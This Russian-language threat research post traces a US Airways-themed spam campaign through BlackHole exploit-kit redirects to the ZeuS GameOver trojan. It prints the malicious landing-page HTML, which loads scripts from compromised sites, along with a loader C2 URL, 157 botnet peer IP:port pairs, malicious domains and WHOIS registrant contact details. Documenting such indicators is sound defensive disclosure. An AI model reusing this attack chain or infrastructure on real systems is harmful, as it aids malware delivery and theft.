Авторы
Спам
20-го марта мы зафиксировали спам-рассылку, нацеленную на пассажиров авиакомпании US Airways. В течение практически всей прошлой недели многочисленным пользователям якобы от компании US Airways рассылалось письмо следующего содержания:
В письме-подделке описывается процесс регистрации полета и приводится код подтверждения для онлайн-бронирования.
По замыслу злоумышленников, если такое письмо получит пассажир, который собирается лететь указанным в письме рейсом, то он, скорее всего, пройдет по ссылке «Online reservation details» («Детали онлайн-бронирования»).
Ссылки в рассылаемых письмах отличались — например, мы видели ссылки на следующие домены: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com.
Пройдя по ссылке, в результате серии редиректов пользователь попадал на страницу с эксплойт-паком BlackHole.
Эксплойт-пак BlackHole: редиректы и заражение
Используется типичная для BlackHole схема заражения.
Сначала по ссылке в письме пользователь попадает на страничку с html-кодом следующей структуры:
<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=»text/javascript» src=»http://boemelparty.be/<removed>/js.js»></script>
<script type=»text/javascript» src=»http://nhb.prosixsoftron.in/<removed>/js.js»></script>
<script type=»text/javascript» src=»http://sas.hg.pl/<removed>/js.js»></script>
<script type=»text/javascript» src=»http://www.vinhthanh.com.vn/<removed>/js.js»></script>
<script type=»text/javascript» src=»http://www.alpine-turkey.com/<removed>/js.js»></script>
<script type=»text/javascript» src=»http://www.thedugoutdawgs.com/<removed>/js.js»></script>
</html>
В результате с разных доменов в браузер пользователя загружаются скрипты, которые по сути являются редиректами — в них содержится команда вида «document.location=’http://indigocellular.com/'». Эта команда направляет пользователя на страничку, код которой содержит обфусцированный javascript.
Результатом работы javascript является вставка в код страницы ссылки на объект с эксплойтом. Мы обнаружили 3 вида таких объектов: jar-файл, swf-файл и документ pdf. Каждый из этих объектов эксплуатирует уязвимость в соответствующем приложение – Java, Flash Player или Adobe Reader, — чтобы запустить на атакуемой машине вредоносный код. Если пользователь использует уязвимую версию хотя бы одного из таких приложений, атака проходит успешно, и на компьютер пользователя загружается и запускается вредоносный исполняемый файл.
Вредоносные jar, swf и pdf документы грузятся с разных доменов — в частности, indigocellular.com, browncellular.com, bronzecellular.com (информация по этим доменам) — под именами Qai.jar, field.swf, dea86.pdf, 11591.pdf.
Эти файлы с эксплойтами ЛК детектирует как:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof
В результате использования уязвимостей с тех же доменов, на которых размещены эксплойты, загружается исполняемый файл. Он может грузиться под разными именами (about.exe, contacts.exe и др.) и по сути является загрузчиком. Загрузчик при запуске связывается с командным центром по URL “176.28.18.135/pony/gate.php”, загружает и запускает на компьютере пользователя другую вредоносную программу — ZeuS/ZBot, точнее, модификацию одной из веток разработки этого троянца, известную под названием GameOver.
ZeuS грузится со взломанных сайтов, в их числе:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com
Полиморфизм
На всех этапах этой атаки все объекты — домены, ссылки на javascript, файлы с эксплойтами, загрузчик и ZeuS — довольно быстро заменялись новыми. Домены «жили» примерно 12 часов, самплы ZeuS менялись чаще.
За те небольшие промежутки времени, в которые велось наблюдение, мне удалось зафиксировать 6 модификаций загрузчика и 3 модификации ZeuS.
Напомню, что одной модификации соответствуют все версии вредоносной программы, которые детектируются с одним и тем же вердиктом, то есть число задетектированных программ, как правило, превышает число вердиктов.
Вердикты загрузчика:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams
Общее число программ, задетектированных этими вердиктами: 250.
Вердикты ZeuS:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Общее число самплов, задетектированных этими вердиктами: 127.
Как уже было сказано выше – это только те вердикты, за которыми мне удалось уследить. За все время спам-кампании новых модификаций появилось, конечно же, больше.
Идентификаторы ботнетов
У ZeuS менялась не только обертка (пакер, антиэмуляция), пересобирался и сам зловред. В нем менялись идентификатор ботнета и некоторые «вшитые» IP-адреса компьютеров, с которыми ZeuS пытается установить связь при заражении. Причем, скорее всего, идентификатор ботнета и IP-адреса менялись при каждой второй перепаковке.
Проанализировав 48 версий различных модификаций ZeuS, которые злоумышленники использовали в этой атаке, я выявил 19 уникальных идентификаторов ботнетов:
| chinz22 | chinz24 | blk25 | mmz22 | mmz24 | mmz25 |
| molotz25 | NR22 | NR23 | NR24 | NR25 | ppcz22 |
| ppcz23 | ppcz24 | rnato25 | rubz22 | rubz23 | rubz24 |
| zuu | |||||
В отличие от традиционного ZeuS, в котором, как правило, содержится один адрес для получения файла конфигурации, в каждом сампле GameOver «зашито» 20 IP-адресов с портами. Заразив компьютер, GameOver пытается установить соединение по этим адресам, чтобы сообщить о себе, получить информацию, например, веб-инжекты, отослать перехваченные у пользователя данные.
Из 960 IP-адресов, полученных в результате анализа 48 самплов, уникальных оказалось 157:
| 109.86.20.192:25071 | 111.252.183.142:22376 | 114.149.70.68:11807 | 114.41.42.83:23061 | 114.47.174.132:25602 |
| 116.68.106.249:17051 | 116.74.63.215:28397 | 117.197.130.195:17253 | 117.200.28.128:26895 | 121.96.154.99:18978 |
| 122.120.6.124:22322 | 122.26.48.225:25178 | 123.231.81.178:20129 | 124.13.56.101:15582 | 125.25.55.156:20834 |
| 140.130.36.32:13590 | 143.90.182.68:15121 | 151.40.222.25:19197 | 161.24.7.83:28740 | 165.228.237.204:17223 |
| 173.11.33.57:28198 | 175.141.221.126:24400 | 177.17.3.94:14470 | 177.41.72.204:19922 | 177.42.233.93:13577 |
| 177.42.26.217:14084 | 178.121.5.147:22245 | 178.156.170.215:14697 | 180.234.242.6:12692 | 186.122.42.176:21468 |
| 186.146.109.235:28038 | 186.169.207.31:25267 | 186.206.85.241:29592 | 186.212.252.139:26376 | 186.61.97.233:18271 |
| 187.21.121.179:29597 | 187.52.165.241:25003 | 187.59.156.215:23810 | 187.78.48.90:28054 | 188.24.177.174:20670 |
| 188.24.183.30:20670 | 188.24.42.247:29919 | 188.24.91.76:18603 | 188.24.94.127:18603 | 188.25.32.93:18509 |
| 188.26.246.185:21181 | 188.27.192.140:10991 | 188.27.77.6:14351 | 189.103.58.227:15863 | 189.106.203.3:22619 |
| 189.113.210.69:16075 | 189.58.63.42:23810 | 190.11.42.132:16838 | 190.183.196.38:27445 | 190.200.120.150:17663 |
| 190.201.27.240:12618 | 190.231.254.101:11271 | 190.26.120.90:22952 | 2.40.249.44:23266 | 200.109.42.212:25890 |
| 200.126.164.122:25565 | 200.84.130.185:29346 | 201.145.184.97:25585 | 201.173.212.122:25493 | 201.21.14.224:19004 |
| 201.58.108.117:19986 | 201.58.79.254:19986 | 202.149.67.164:26124 | 206.219.64.130:21401 | 208.180.223.27:12046 |
| 213.163.112.183:22254 | 213.164.225.186:25619 | 216.187.184.34:28333 | 218.170.36.242:13286 | 218.170.42.95:13286 |
| 221.133.18.131:12492 | 222.124.55.128:29563 | 24.154.22.50:13524 | 27.119.46.174:22985 | 27.4.113.69:27664 |
| 41.102.165.37:29870 | 41.252.115.102:25734 | 46.197.66.43:29879 | 49.128.175.94:24566 | 50.129.124.49:28454 |
| 60.246.131.173:23424 | 61.78.79.8:16362 | 66.193.204.141:26171 | 68.127.16.166:22762 | 68.150.204.237:16150 |
| 71.11.205.72:23114 | 72.185.157.254:29727 | 72.199.188.132:25142 | 72.64.43.86:21316 | 75.108.18.26:21332 |
| 75.127.204.90:10945 | 75.35.88.121:26277 | 76.185.32.7:18942 | 77.254.230.170:15741 | 78.166.182.155:12114 |
| 78.61.173.28:22352 | 78.62.246.91:16094 | 78.87.143.67:21277 | 79.112.219.78:13525 | 79.112.231.138:13644 |
| 79.113.104.28:29098 | 79.113.104.97:29098 | 79.115.143.244:16824 | 79.115.226.238:14247 | 79.116.121.163:14751 |
| 79.116.28.147:27683 | 79.117.177.174:12523 | 79.118.247.63:14481 | 79.38.117.69:18242 | 79.39.241.147:29216 |
| 79.47.239.67:28246 | 81.0.94.178:27735 | 81.214.253.235:13820 | 81.64.159.213:22322 | 81.65.125.102:24715 |
| 82.131.113.220:15271 | 82.131.141.80:27735 | 82.211.174.146:25219 | 82.88.65.111:17345 | 83.228.43.66:11167 |
| 83.4.30.245:21628 | 84.232.253.30:19202 | 84.32.66.38:25067 | 85.110.206.175:22346 | 85.250.176.250:15494 |
| 86.121.16.63:27337 | 86.124.108.93:20225 | 87.126.224.174:11314 | 87.207.108.163:14491 | 87.24.128.66:14935 |
| 88.235.4.104:22459 | 88.250.42.18:14086 | 89.120.100.121:19228 | 89.136.130.155:22321 | 89.137.18.224:21326 |
| 91.127.173.36:10734 | 91.179.41.185:15941 | 91.179.41.185:24693 | 92.241.134.103:26870 | 94.122.71.97:11842 |
| 94.203.147.11:20599 | 94.39.240.218:14338 | 94.53.198.35:24596 | 94.66.81.228:15663 | 95.104.111.141:11838 |
| 95.226.45.198:18846 | 95.56.143.17:23352 | 95.9.163.52:24483 | 97.78.7.0:10159 | 99.169.224.231:22266 |
| 99.190.137.80:12109 | 99.7.203.52:18700 |
География атаки
Могу предположить, что на прошлой неделе для распространения ZeuS использовалось не только спам-письмо со ссылкой на подтверждение онлайн-бронирования полетов в компании US Airways. Злоумышленникам не откажешь в оригинальности — хотя они уже не раз прибегали к теме, связанной с авиаперелетами, но такой спам замечен впервые. Если получатель письма входит в целевую аудиторию, то с большой вероятностью нажмет на вредоносную ссылку. Однако большинство пользователей, получивших такое письмо, никуда не собирались лететь, так что среагировали на него немногие.
Очевидно, рассылались и другие спамовые письма со ссылками, которые вели на те же сайты, те же эксплойты и на те же вредоносные программы, о которых рассказано выше. Я посмотрел, в каких странах на прошлой неделе на компьютерах наших пользователей чаще всего блокировались угрозы, так или иначе связанные с этой атакой. Ниже приведено распределение детектов эксплойтов, загрузчиков и модификаций ZeuS, использованных злоумышленниками, по странам:
| Россия | 32.8% |
| США | 10.3% |
| Италия | 9.2% |
| Германия | 8.6% |
| Индия | 6.9% |
| Франция | 3.8% |
| Украина | 3.6% |
| Польша | 3.2% |
| Бразилия | 3.1% |
| Малайзия | 3% |
| Испания | 2.9% |
| Китай | 2.7% |
P.S. Информация о некоторых вредоносных доменах, замеченных в описанной спам-кампании:
| indigocellular.com | 209.59.218.102 |
| Зарегистрирован на: | Nicholas Guzzardi, clarelam@primasia.com |
| 5536 Gold Rush Dr.NW | |
| 87120 Albuquerque | |
| United States | |
| Tel: +1.5053505497 | |
| browncellular.com | 174.140.168.207 |
| Зарегистрирован на: | Renee Fabian, clarelam@primasia.com |
| 2840 Center Port Circle | |
| Pompano Beach, FL 33064 | |
| US | |
| bronzecellular.com | 96.9.151.220 |
| Зарегистрирован на: | Renee Fabian, clarelam@primasia.com |
| 2840 Center Port Circle | |
| Pompano Beach, FL 33064 | |
| US |
function showSpoiler()
{
var inner = document.getElementById («tmpdiv»);
var sp_a = document.getElementById («spoiler_anchor»);
if (inner.style.display == «none»)
{
inner.style.display = «»;
sp_a.innerHTML = «-Свернуть список ip-адресов»;
}
else
{
inner.style.display = «none»;
sp_a.innerHTML = «+Развернуть список ip-адресов»;
}
}
Авторы
От тех же авторов
В той же категории
ZeuS-подарок для пассажиров US Airways